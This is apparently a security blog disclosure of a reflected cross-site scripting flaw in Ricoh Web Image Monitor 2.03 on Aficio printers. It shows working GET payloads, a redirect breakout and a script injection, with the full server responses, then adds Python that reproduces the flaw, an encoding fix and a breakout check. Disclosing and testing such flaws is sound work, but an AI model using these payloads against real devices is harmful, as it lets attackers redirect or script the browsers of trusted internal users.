I was poking at some Ricoh MFPs several days ago, when I found this. It is nothing to get too terribly excited about, as it's just a reflected XSS. However, the ability to abuse any trusted internal IP should be considered a threat. Companies have taken big hits from less. So without further ado, here are the petty little details:

Tested successfully on numerous different Ricoh Aficio models, all running v2.03 of the Web Image Monitor interface. Responses included below are HTML encoded for your protection.

Fun with Redirects:

My initial test was just an abuse of the redirect functionality that is being exploited for the vector.

GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1

HTTP/1.0 200 OK
Date: Tue, 09 Nov 2010 17:58:00 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 683
Expires: Tue, 09 Nov 2010 17:58:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="http://cosine-security.blogspot.com";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
</html>

A more traditional XSS test will still work just as well, of course:

Traditional Test:

GET /?--></script><script>alert(51494)</script> HTTP/1.1

HTTP/1.0 200 OK
Date: Fri, 29 Oct 2010 17:43:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 672
Expires: Fri, 29 Oct 2010 17:43:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>

The same writeup, including a screenshot, can be found at http://cosine-security.blogspot.com/2010/11/ricoh-web-image-monitor-203-reflected.html
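The root cause visible in both responses is that the raw query string is concatenated into a double-quoted JavaScript string literal inside an inline script. The Python below is an added example, not Ricoh's code or the author's: it reconstructs that pattern in a hypothetical template (BASE, jumpPage) beside a hardened rendering that emits the whole URL as a properly encoded JS string literal, plus the check a regression test or scanner would run on a response body to tell the two apart. The two payloads from the post are reused as constructed input.

```python
import json
import re

# The Web Image Monitor 2.03 responses above drop the raw query string into a
# double-quoted JS string literal inside an inline <script>. BASE and the
# template below are a hypothetical reconstruction of that pattern, not Ricoh's code.
BASE = "/web/guest/en/websys/webArch/mainFrame.cgi?"

# The two payloads from the post, reused here as constructed test input.
PAYLOAD_REDIRECT = '";location.href="http://cosine-security.blogspot.com'
PAYLOAD_SCRIPT = "--></script><script>alert(51494)</script>"


def render_vulnerable(query: str) -> str:
    # The flawed pattern: the query is concatenated into the literal unmodified.
    return 'function jumpPage(){ location.href="' + BASE + query + '"; }'


def js_string_literal(value: str) -> str:
    # json.dumps handles quotes, backslashes and control characters. The extra
    # replacements turn <, > and & into \u00XX escapes so the literal can never
    # spell </script>, --> or an entity, whatever the HTML parser sees around it.
    # The result is still valid JSON, so it round-trips through json.loads.
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_hardened(query: str) -> str:
    # Same script, but the whole URL is emitted as one correctly encoded literal.
    return "function jumpPage(){ location.href=" + js_string_literal(BASE + query) + "; }"


# Shape the script must keep: exactly one intact JS string literal as the href.
_INTACT = re.compile(r'^function jumpPage\(\)\{ location\.href="((?:[^"\\]|\\.)*)"; \}$')


def breaks_out(rendered: str) -> bool:
    # Check a test harness can run on a response body: did the reflected value
    # escape the string or script context it was meant to stay inside?
    m = _INTACT.match(rendered)
    if not m:
        return True  # literal terminated early; the rest of the payload runs as code
    # Even inside an intact JS string, a raw "<" can spell </script> and end the
    # script element at the HTML level, so it may only appear as \u003c.
    return "<" in m.group(1)


def round_trips(query: str) -> bool:
    # Functional check: the encoded literal still decodes to the intended URL.
    return json.loads(js_string_literal(BASE + query)) == BASE + query
```

Both payloads trip breaks_out on the vulnerable rendering and pass on the hardened one, while round_trips confirms the redirect target the firmware meant to build is unchanged.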